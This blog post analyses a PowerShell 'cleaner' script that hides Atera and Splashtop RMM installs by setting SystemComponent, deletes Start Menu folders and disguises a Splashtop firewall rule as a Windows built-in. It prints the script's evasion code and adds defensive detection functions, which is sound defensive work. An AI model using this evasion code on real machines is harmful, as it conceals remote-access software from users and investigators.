Removing Traces of RMM Tools

Fox_threatintel tweeted recently about an open directory on I downloaded all the files from this directory and stumbled upon a ‘cleaner’ script, which we will examine in this short blog post. The original script is available on VirusTotal.

Figure 1: Tweet from Fox_threatintel

Find installed software

First, the script defines an array ($uninstallKeys), holding two registry keys:

$uninstallKeys = @(

In our case, the script explicitly searches for the RMM products Atera and Splashtop:

$softwareNamesToFind = @("AteraAgent", "Splashtop Streamer")

The script then iterates over the subkeys of the two registry keys, reads the DisplayName value of each one and compares it with the names in $softwareNamesToFind (Atera and Splashtop, see above). Matching keys are collected in $foundSoftwareKeys:

$foundSoftwareKeys = @()   # collects the uninstall keys that match

foreach ($uninstallKey in $uninstallKeys) {
    Get-ChildItem -Path $uninstallKey | ForEach-Object {
        $displayName = (Get-ItemProperty -Path $_.PSPath).DisplayName
        foreach ($softwareName in $softwareNamesToFind) {
            if ($displayName -eq $softwareName) {
                # "$softwareName found in $_.PSPath"; note that only $_ is expanded inside the
                # string, the literal ".PSPath" is what shows up in the output further down
                Write-Host "$softwareName найден в $_.PSPath"
                $foundSoftwareKeys += $_.PSPath
            }
        }
    }
}

If the script finds an Atera or Splashtop entry, it sets the DWORD value SystemComponent to 1 inside that uninstall key. Windows does not list entries with SystemComponent=1 in Apps & features (or in the classic Programs and Features applet), so the product is "hidden" from the graphical interface, and inventory tools that apply the same filter might be fooled as well. The key itself, and the software, stay where they are.

foreach ($softwareKeyPath in $foundSoftwareKeys) {
    # "Setting SystemComponent to 1 for $softwareKeyPath"
    Write-Host "Установка значения SystemComponent в 1 для $softwareKeyPath"
    Set-ItemProperty -Path $softwareKeyPath -Name "SystemComponent" -Value 1 -Type DWORD
}
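The opposite of what the cleaner does is what an investigator wants: a list of uninstall entries that are hidden via SystemComponent=1 or whose name looks like an RMM product. The following PowerShell function is an added example and not part of the analysed script; it walks the same two machine-wide Uninstall keys (plus the per-user HKCU key, which the cleaner ignores), and the watch list of product names is an illustrative assumption that you would extend for your environment. The -Unhide switch reverses the cleaner's change for hidden entries that match the watch list.

```powershell
function Find-HiddenUninstallEntry {
    [CmdletBinding()]
    param(
        # Illustrative RMM product names (assumption, extend as needed)
        [string[]]$WatchList = @('AteraAgent', 'Splashtop Streamer', 'AnyDesk', 'TeamViewer', 'ScreenConnect'),
        # Set SystemComponent back to 0 for hidden entries that hit the watch list
        [switch]$Unhide
    )

    # The two machine-wide Uninstall keys the cleaner walks, plus the per-user one
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    )

    foreach ($uninstallKey in $uninstallKeys) {
        Get-ChildItem -Path $uninstallKey -ErrorAction SilentlyContinue | ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath
            if (-not $props.DisplayName) { return }          # nothing to match on

            $hidden  = ($props.SystemComponent -eq 1)        # hidden from Apps & features
            $matched = @($WatchList | Where-Object { $props.DisplayName -like "*$_*" })

            if ($hidden -or $matched.Count -gt 0) {
                if ($Unhide -and $hidden -and $matched.Count -gt 0) {
                    # Make the entry visible again in Apps & features
                    Set-ItemProperty -Path $_.PSPath -Name 'SystemComponent' -Value 0 -Type DWORD
                }
                [pscustomobject]@{
                    DisplayName     = $props.DisplayName
                    Hidden          = $hidden
                    WatchListHit    = ($matched -join ', ')
                    Publisher       = $props.Publisher
                    InstallLocation = $props.InstallLocation
                    Key             = $_.Name
                }
            }
        }
    }
}

# List hidden or RMM-looking entries; add -Unhide to undo the cleaner's change
Find-HiddenUninstallEntry | Format-Table -AutoSize
```

Keep in mind that SystemComponent=1 is used legitimately by plenty of installers (runtime redistributables, SDK components and the like), so a hidden entry on its own is not an alert; the combination of Hidden=True and a watch list hit is the one that matters, and the rest of the hidden entries are worth a quick look rather than an alarm.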

Removing folders

After "hiding" the two possible uninstall entries from Apps & features, the script next removes Start Menu folders (it does not touch the installation folders under Program Files):

$foldersToDelete = @(
    "Anydesk Custom Client",
    "Splashtop Remote"
)

The code searches the current user's Start Menu Programs folder and the all-users one (which lives under ProgramData) recursively for items whose name matches an entry in $foldersToDelete, and deletes every match together with its contents using Remove-Item -Force -Recurse. Note that the folder list names AnyDesk, which the registry search above does not look for.

$startMenuPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
$programDataPath = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"

foreach ($folderName in $foldersToDelete) {
    $startMenuItems = Get-ChildItem -Path "$startMenuPath" -Filter $folderName -Recurse
    $programDataItems = Get-ChildItem -Path "$programDataPath" -Filter $folderName -Recurse

    foreach ($item in $startMenuItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        # "Removed folder $($item.Name) from the AppData folder."
        Write-Host "Удалена папка $($item.Name) из папки AppData."
    }

    foreach ($item in $programDataItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        # "Removed folder $($item.Name) from the ProgramData folder."
        Write-Host "Удалена папка $($item.Name) из папки ProgramData."
    }
}

Remove traces in the Firewall Rules

Last, the script renames the Splashtop firewall rule with Set-NetFirewallRule, giving it the display name and description of the built-in Windows rule "Cast to Device streaming server (HTTP-Streaming-In)". Only the display name and the description change; the rule's internal Name, the program it applies to and its ports stay as Splashtop created them. The comment inside the code reads, translated from Russian to English: "Change the name and description of the rule to 'Cast to Device streaming server (HTTP-Streaming-In)'":

$splashtopRuleName = Get-NetFirewallRule | Where-Object { $_.DisplayName -like "*Splashtop*" } | Select-Object -ExpandProperty Name

# Изменить название и описание правила на "Cast to Device streaming server (HTTP-Streaming-In)"
# (Change the name and description of the rule to "Cast to Device streaming server (HTTP-Streaming-In)")
if ($splashtopRuleName) {
    Set-NetFirewallRule -Name $splashtopRuleName -NewDisplayName "Cast to Device streaming server (HTTP-Streaming-In)" -Description "Inbound rule for the Cast to Device server to allow streaming using HTTP. [TCP 10247]"
    # "The name and description of the firewall rule for Splashtop Streamer have been changed."
    Write-Host "Название и описание правила брандмауэра для Splashtop Streamer изменены."
} else {
    # "Firewall rule for Splashtop Streamer not found."
    Write-Host "Правило брандмауэра для Splashtop Streamer не найдено."
}
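Because -NewDisplayName changes only the label, the renamed rule still carries its original Name and still points at the Splashtop executable. The following PowerShell function is an added example, not code from the analysed script: it lists enabled inbound allow rules whose program lives outside %SystemRoot% or matches an RMM path pattern, and prints DisplayName next to Name and Program so that a "Cast to Device" label sitting on a non-Windows binary stands out. The path patterns are an illustrative assumption.

```powershell
function Find-SuspiciousFirewallRule {
    [CmdletBinding()]
    param(
        # Illustrative substrings of RMM install paths (assumption, extend as needed)
        [string[]]$RmmPathPatterns = @('Splashtop', 'AnyDesk', 'Atera', 'TeamViewer', 'ScreenConnect')
    )

    $windir = $env:SystemRoot    # e.g. C:\Windows

    # Only enabled inbound allow rules can expose a listener to the network
    Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow | ForEach-Object {
        $rule = $_
        $app  = $rule | Get-NetFirewallApplicationFilter
        $port = $rule | Get-NetFirewallPortFilter

        # Rules bound to no program ("Any") or to the kernel ("System") are out of scope here
        if ($app.Program -in @($null, '', 'Any', 'System')) { return }

        $program        = [Environment]::ExpandEnvironmentVariables($app.Program)
        $outsideWindows = -not $program.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)
        $rmmHit         = @($RmmPathPatterns | Where-Object { $program -like "*$_*" })

        if ($outsideWindows -or $rmmHit.Count -gt 0) {
            [pscustomobject]@{
                DisplayName = $rule.DisplayName   # what the cleaner rewrote
                Name        = $rule.Name          # internal rule ID, untouched by -NewDisplayName
                Program     = $program
                Protocol    = $port.Protocol
                LocalPort   = ($port.LocalPort -join ',')
                RmmPathHit  = ($rmmHit -join ',')
            }
        }
    }
}

# Rules with an RMM path hit sort to the top
Find-SuspiciousFirewallRule | Sort-Object RmmPathHit -Descending | Format-Table -AutoSize
```

Every third-party application with an inbound rule shows up in this list, so it is a review list rather than an alert. The mismatch to look for is a DisplayName copied from a Windows built-in rule combined with a Program path under a third-party directory, which is exactly what the cleaner produces.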


I installed Splashtop Streamer on a test machine and ran the PowerShell code. I received the following output:

Splashtop Streamer найден в HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Установка значения SystemComponent в 1 для Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Удалена папка Splashtop Remote из папки ProgramData.
Название и описание правила брандмауэра для Splashtop Streamer изменены. 

Here is the translated version:

Splashtop Streamer found in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Setting the SystemComponent value to 1 for Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Removed Splashtop Remote folder from the ProgramData folder.
The name and description of the firewall rule for Splashtop Streamer have been changed. 

Indeed, Splashtop is no longer visible in the Apps & features window. The entry is hidden, not removed, though: setting SystemComponent back to 0 makes it visible again.

Figure 2: Apps & Features

And yes, the firewall rule has been renamed as well, but the program the rule applies to still points to Splashtop, which gives the game away :)

Figure 3: Adjusted Firewall rule


Honestly, I have no idea who came up with this script and thinks it covers enough tracks. Under certain circumstances, ordinary users could be fooled into believing that no RMM software was installed on their computers. For an investigator, these small changes make little difference: the uninstall key is still there (only SystemComponent was set), the installation folder and any service or running process of the product are untouched, the firewall rule still points at the Splashtop binary, and artifacts such as the System event log entry written when a service is installed (event ID 7045), Prefetch and Amcache still tell us what software was installed or running on the computers or servers in question.